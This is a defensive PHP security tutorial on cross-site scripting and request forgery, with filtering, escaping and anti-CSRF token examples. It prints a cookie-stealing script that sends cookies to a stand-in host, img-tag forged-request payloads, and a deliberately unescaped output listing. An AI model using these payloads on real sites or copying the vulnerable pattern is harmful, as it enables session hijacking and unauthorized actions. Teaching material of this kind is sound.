Foiling Cross-Site Attacks

Published in PHP Architect on 14 Oct 2003

This article explores two contrasting attack vectors, cross-site scripting (XSS) and cross-site request forgeries (CSRF). As you read this article, I hope you will not only learn some specific strategies for protecting against these specific attacks, but that you will also gain a deeper understanding of web application security principles in general.

Cross-Site Scripting

If you're a web developer, you've most likely heard about XSS. In fact, you may have already taken steps to protect your applications against XSS attacks. The effectiveness of such protective measures depends upon whether you're addressing the root cause of the problem or just a symptom, and of course how well you understand the problem in the first place. It is a common tendency to only address a specific exploit in much the same way that you might resolve a bug using a specific test case. With this strategy, a web developer's effort is less effective. You want to address the root cause of a problem whenever possible.

The fundamental error that yields XSS vulnerabilities is a blind trust of remote data (input). A general recommendation among web developers is to never trust user input, but protecting against XSS requires more, because any input can be dangerous, not just input that comes directly from users. Examples include posts on a forum, email displayed in a browser, an advertisement, stock quotes provided in a feed, and form data. Any useful application handles a lot of input, and these are the applications that require the most attention. The risk is not just that you trust the input, but that you assume it is safe to display to your users. Your users trust you, and XSS attacks exploit that trust.

To understand why displaying such data can be dangerous, consider a simple registration form where users provide a preferred username along with their email address, and their registration information is emailed to them once their account is created. The following form might be used to solicit this information:

    <form action="/register.php" method="POST">
    <p>Username: <input type="text" name="username" /></p>
    <p>Email: <input type="text" name="email" /></p>
    <p><input type="submit" value="Register" /></p>
    </form>

Figure 1 illustrates how this form might appear in a browser.

Figure 1: A Simple Registration Form

If the data sent by this form is not properly filtered, malicious users can send malicious data to register.php, and the only limit to what they can do is the limit of their creativity.

Consider if the registration data is stored in a database as follows:

    <?php

    $mysql = array();
    $mysql['username'] = mysql_real_escape_string($_POST['username']);
    $mysql['email'] = mysql_real_escape_string($_POST['email']);

    $sql = "INSERT
            INTO users (username, email)
            VALUES ('{$mysql['username']}', '{$mysql['email']}')";

    ?>

Hopefully the use of $_POST is conspicuous. Although $_POST['username'] and $_POST['email'] are escaped properly for MySQL, this example still demonstrates a blind trust of this data. With legitimate users, the dangers of this approach will remain hidden, and this is exactly how many web application vulnerabilities are born. Consider the following username:

    <script>alert('XSS');</script>

Although it is easy to see that this is not a valid username, the code in the previous example is not so discerning. Without input filtering, anything can end up in the database. Of course, the danger in the case of XSS arises when this data is displayed to users.

Assume that this particular registration system has an administrative interface that is only accessible from the local network by authorized users. It is easy to assume that an application inaccessible from the outside is safe, and less effort might be invested in the security of such an application. Now, consider the code in Listing 1 that displays a list of registered users to authorized administrators.

Listing 1:

    <table>
        <tr>
            <th>Username</th>
            <th>Email</th>
        </tr>

    <?php

    if ($_SESSION['admin']) {
        $sql = 'SELECT username, email
                FROM users';

        $result = mysql_query($sql);

        while ($record = mysql_fetch_assoc($result)) {
            echo " <tr>\n";
            echo " <td>{$record['username']}</td>\n";
            echo " <td>{$record['email']}</td>\n";
            echo " </tr>\n";
        }
    }

    ?>

    </table>

If the data in the database is tainted, an administrator might be subjected to XSS by using this application. This risk is illustrated in Figure 2.
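To make the risk concrete, the following minimal sketch builds one table row the same way Listing 1 does, using a hard-coded record in place of a database row. The function name render_row_unescaped() and the sample record are assumptions made for illustration and are not part of the original application.

```php
<?php

// Hypothetical helper: builds a row exactly as Listing 1 does, with no escaping.
function render_row_unescaped(array $record): string
{
    return " <tr>\n"
         . " <td>{$record['username']}</td>\n"
         . " <td>{$record['email']}</td>\n"
         . " </tr>\n";
}

// A tainted record, standing in for a row fetched from the users table.
$record = [
    'username' => "<script>alert('XSS');</script>",
    'email'    => 'attacker@example.org',
];

$row = render_row_unescaped($record);

// The script element reaches the page intact, so the administrator's
// browser would execute it as part of the page.
echo $row;
```

Nothing in this path distinguishes markup written by the developer from markup supplied by whoever registered the account.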

Figure 2: XSS Can Penetrate Firewalls

This risk is even clearer if you consider a more malicious payload such as the following:

    <script>
    new Image().src =
        'http://example.org/steal.php?cookies=' +
        encodeURI(document.cookie);
    </script>

If this is displayed to an administrator, the administrator's cookies will be sent to example.org. In this example, steal.php can access the cookies with $_GET['cookies']. Once captured, these cookies can be used to hijack the administrator's session.

Safeguarding Against XSS

There are a few guidelines that you can follow to help safeguard your applications against XSS attacks. Hopefully you can already predict a few of these.

Filter All Input
You must, without fail, filter all input. Inspect all input, and only allow valid data into your application.
Escape All Output
You should also escape all output. Data that is meant to be displayed as raw data, rather than interpreted as HTML, must be escaped for the context of HTML.
Use Mature Solutions
When possible, use mature, existing solutions instead of trying to create your own. Functions like strip_tags() and htmlentities() are good choices.
Only Allow Safe Content
Instead of trying to predict what malicious data you want to reject, define your criteria for valid data, and force all input to abide by your guidelines. For example, if a user is supplying a last name, you might start by only allowing alphabetic characters and spaces, as these are safe. If you reject everything else, Berners-Lee and O'Reilly will be rejected, despite being valid last names. However, this problem is easily resolved. A quick change to also allow single quotes and hyphens is all you need to do. Over time, your input filtering techniques will be perfected.
Use a Naming Convention
There are many naming conventions that you can use to identify whether a particular variable is tainted. Choose whichever convention is most intuitive to you, and use it consistently in all of your development. A simple example is to initialize an array called $clean, and only store data in $clean once it has been filtered.
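
The guidelines above can be combined in a short sketch. The helper names (is_valid_username(), is_valid_last_name(), escape_html()), the specific validation rules, and the $html array for escaped output are all assumptions chosen for illustration; only $clean and htmlentities() come from the text. The input is simulated with a plain array where register.php would use $_POST.

```php
<?php

// Hypothetical rule: a username is 1 to 32 letters or digits.
function is_valid_username(string $input): bool
{
    return strlen($input) <= 32 && ctype_alnum($input);
}

// Hypothetical rule: a last name contains only letters, spaces,
// single quotes, and hyphens, so Berners-Lee and O'Reilly pass.
function is_valid_last_name(string $input): bool
{
    return preg_match('/\A[A-Za-z \'-]+\z/', $input) === 1;
}

// Escape a value for the context of HTML just before it is displayed.
function escape_html(string $value): string
{
    return htmlentities($value, ENT_QUOTES, 'UTF-8');
}

// Simulated form input; a real script would read these from $_POST.
$input = [
    'username'  => "<script>alert('XSS');</script>",
    'last_name' => "O'Reilly",
];

// Naming convention: data is stored in $clean only after it passes a filter.
$clean = [];

if (is_valid_username($input['username'])) {
    $clean['username'] = $input['username'];
}

if (is_valid_last_name($input['last_name'])) {
    $clean['last_name'] = $input['last_name'];
}

// Naming convention: $html holds values already escaped for display.
$html = [];

foreach ($clean as $name => $value) {
    $html[$name] = escape_html($value);
}

// The malicious username was rejected, so only the last name is displayed.
foreach ($html as $name => $value) {
    echo "<td>{$value}</td>\n";
}
```

Filtering and escaping are kept as separate steps on purpose: the filter decides what is allowed into the application, and the escaping protects the page even if something unexpected gets through.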

Cross-Site Request Forgeries

CSRF is an almost opposite type of attack. Rather than exploiting the trust that a user has for a particular site, CSRF exploits the trust that a site has for a particular user. In the case of XSS, the user is the victim. In the case of CSRF, the user is an accomplice.

Because CSRF involves a forged HTTP request, it is important to first understand a little bit about HTTP, the protocol that web clients and servers use to communicate. Web clients (browsers) send HTTP requests to web servers, and the servers return HTTP responses in reply. A request and its corresponding response make up an HTTP transaction. A basic example of an HTTP request is as follows:

    GET / HTTP/1.1
    Host: example.org

The URL being requested in this example is http://example.org/. Here is a slightly more realistic example of a request for this resource:

    GET / HTTP/1.1
    Host: example.org
    User-Agent: Mozilla/1.4
    Accept: text/xml, image/png, image/jpeg, image/gif, */*

This example demonstrates the use of two additional HTTP headers: User-Agent and Accept. The Host header, present in both examples, is required in HTTP/1.1. There are many HTTP headers that may be included in a request, and you might be familiar with referencing some of these in your code. PHP makes these available to you in the $_SERVER array as $_SERVER['HTTP_HOST'], $_SERVER['HTTP_USER_AGENT'], and $_SERVER['HTTP_ACCEPT']. For the remainder of this article, optional headers will be omitted for brevity in the examples.
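
As a brief aside, the mapping from header names to $_SERVER keys described above can be sketched as follows. The request_header() helper is hypothetical, and the $server array simulates the values PHP would populate for the second request shown earlier; a real script would pass $_SERVER instead.

```php
<?php

// Hypothetical helper: look up a request header in a $_SERVER-style array.
// PHP exposes a header such as User-Agent under the key HTTP_USER_AGENT.
function request_header(array $server, string $name): ?string
{
    $key = 'HTTP_' . strtoupper(str_replace('-', '_', $name));

    return isset($server[$key]) ? (string) $server[$key] : null;
}

// Simulated values for the request above.
$server = [
    'HTTP_HOST'       => 'example.org',
    'HTTP_USER_AGENT' => 'Mozilla/1.4',
    'HTTP_ACCEPT'     => 'text/xml, image/png, image/jpeg, image/gif, */*',
];

$host    = request_header($server, 'Host');
$agent   = request_header($server, 'User-Agent');
$referer = request_header($server, 'Referer'); // not sent in this request

var_dump($host, $agent, $referer);
```

Because the client sends these headers, their values are input like any other and deserve the same filtering.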

The simplest example of a CSRF attack uses an <img> tag to initiate the forged request. To explain how this is possible, consider a request for http://example.org/ that prompts the following response:

    HTTP/1.1 200 OK
    Content-Length: 61

    <html>
    <img src="http://example.org/image.png" />
    </html>

When a browser interprets the HTML content, it will send a GET request for each additional resource it needs to render the page. For example, after interpreting this response, an additional request is sent for the image:

    GET /image.png HTTP/1.1
    Host: example.org

The most important characteristic of this request is that it is identical to a request initiated directly by the user. This is because requests for images are no different than requests for any other URL. A resource is a resource.

Figure 3 illustrates how CSRF can abuse this behavior.

Figure 3: A CSRF Attack Initiated from an Image

In order to appreciate the risk, consider a simple forum located at http://forum.example.org/ that provides the following form for adding a post:

    <form action="/post.php">
    <p>Subject: <input type="text" name="subject" /></p>
    <p>Message: <textarea name="message"></textarea></p>
    <p><input type="submit" value="Add Post" /></p>
    </form>

If a user enters foo as the subject and bar as the message, an HTTP request similar to the following will be sent (assuming that the session identifier is propagated as a cookie):

    GET /post.php?subject=foo&message=bar HTTP/1.1
    Host: forum.example.org
    Cookie: PHPSESSID=123456789

Consider the following <img> tag:

    <img src="http://forum.example.org/post.php?subject=foo&message=bar" />

When a browser requests this image, the HTTP request will look identical to the previous example, including the PHPSESSID cookie. With a simple change to the URL, an attacker can modify the subject and message to be anything, even an XSS payload. All the attacker must do to launch the attack is have the victim(s) visit a page that contains this image, and the victim's browser will do the rest, all behind the scenes. The victim will likely be completely unaware of the attack.

More dangerous attacks might forge requests to purchase items or perform administrative tasks on a restricted intranet application. Consider an application located at http://192.168.0.1/admin/ that allows authorized users to terminate employees. Even with a flawless session management mechanism that is immune to impersonation, and even though this application cannot be accessed by users outside of the local network, a CSRF attack can bypass these safeguards with something as simple as the following:

    <img src="http://192.168.0.1/admin/terminate_employee.php?employee_id=123" />

Figure 4 illustrates this particular attack and how it can be used to penetrate an otherwise secure local network.

Figure 4: CSRF Can Penetrate Firewalls

The most challenging characteristic of CSRF is that a legitimate user is sending the request. Also, because it is unrealistic to rely on other web sites to disallow <img> tags, especially since the attacker could coerce the victim into visiting the attacker's own site, the problem must be addressed upon receipt. Preventing forged requests is unrealistic. Detecting them is essential.

Safeguarding Against CSRF

Safeguarding your applications against CSRF is a bit more challenging than safeguarding them against XSS attacks, but there are a few guidelines that you can follow.

Use POST
Although it doesn't prevent CSRF, you should require POST for any request that performs an action. This also means using $_POST instead of $_REQUEST.
Require Verification
Although convenience is a hallmark of good design, if a single request can trigger an important action, the risk of CSRF is increased. For important actions, don't hesitate to ask the user for verification. For extremely sensitive actions, consider requiring the user to provide a password in order to authorize the action.
Use an Anti-CSRF Token
The root cause of CSRF is a failure to verify intent. In order to help verify intent, consider adding an anti-CSRF token to your forms. Consider Listing 2 as a substitute for the form used to post to forum.example.org. When a user requests this form, a new token is generated, saved in the user's session, and included in the form as a hidden form variable. Therefore, when a request is received by post.php, not only can $_POST['token'] be compared with $_SESSION['token'], but a timeout can also be applied to further minimize the risk. This tactic practically eliminates CSRF.

Listing 2:

    <?php

    // random_bytes() (PHP 7 or later) draws from a cryptographically secure
    // source, so the token is much harder to guess than one built with
    // md5(uniqid(rand(), TRUE)).
    $token = bin2hex(random_bytes(16));
    $_SESSION['token'] = $token;
    $_SESSION['token_timestamp'] = time();

    ?>

    <form action="/post.php" method="POST">
    <input type="hidden" name="token" value="<?php echo $token; ?>" />
    <p>Subject: <input type="text" name="subject" /></p>
    <p>Message: <textarea name="message"></textarea></p>
    <p><input type="submit" value="Add Post" /></p>
    </form>
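
The receiving side of this exchange might look like the following minimal sketch. The is_valid_token() helper and the 300-second lifetime are assumptions made for illustration; the article specifies only that the submitted token is compared with the one in the session and that a timeout can be applied. The session and form data are simulated with plain arrays so the logic can be run on its own.

```php
<?php

// Hypothetical helper for post.php: returns true only when the submitted
// token matches the one stored in the session and the token is recent.
// The default lifetime of 300 seconds is an assumed value.
function is_valid_token(array $post, array $session, int $now, int $max_age = 300): bool
{
    // A forged request typically carries no token at all.
    if (!isset($post['token'], $session['token'], $session['token_timestamp'])) {
        return false;
    }

    if (!is_string($post['token']) || !is_string($session['token'])) {
        return false;
    }

    // Apply the timeout.
    if ($now - (int) $session['token_timestamp'] > $max_age) {
        return false;
    }

    // hash_equals() compares the two strings in constant time.
    return hash_equals($session['token'], $post['token']);
}

// Simulated session data, as stored when the form was generated.
$session = ['token' => 'abc123', 'token_timestamp' => 1000];

$ok      = is_valid_token(['token' => 'abc123'], $session, 1100);
$forged  = is_valid_token([], $session, 1100);
$wrong   = is_valid_token(['token' => 'guess'], $session, 1100);
$expired = is_valid_token(['token' => 'abc123'], $session, 2000);

var_dump($ok, $forged, $wrong, $expired);
```

In post.php, a check along these lines would be called as is_valid_token($_POST, $_SESSION, time()) after the session has been started and after confirming that $_SERVER['REQUEST_METHOD'] is POST, with the post being added only when it returns true.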

Summary

I hope you now have a solid understanding of both XSS and CSRF. The key to web application security is to make life easy for the good guys and difficult for the bad guys. No application is completely secure, so try to focus on making attacks as difficult as possible.

Every obstacle helps.